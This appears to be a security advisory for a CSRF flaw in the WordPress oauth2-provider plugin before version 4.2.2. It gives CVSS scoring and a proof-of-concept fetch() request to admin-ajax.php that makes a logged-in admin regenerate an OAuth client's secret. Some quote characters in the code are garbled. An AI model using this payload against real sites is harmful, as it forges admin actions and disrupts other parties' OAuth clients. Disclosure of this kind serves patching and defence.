6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
The plugin does not have CSRF check when regenerating secrets, which could allow attackers to make logged in admins regenerate the secret of an arbitrary client given they know the client ID
Make a logged in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7 fetch(βhttps://example.com/wp-admin/admin-ajax.phpβ, { method: βPOSTβ, headers: new Headers({ βContent-Typeβ: βapplication/x-www-form-urlencodedβ, }), body: βaction=wo_regenerate_secret&data;=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7β, redirect: βfollowβ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(βerrorβ, error));
CPE | Name | Operator | Version |
---|---|---|---|
oauth2-provider | lt | 4.2.2 |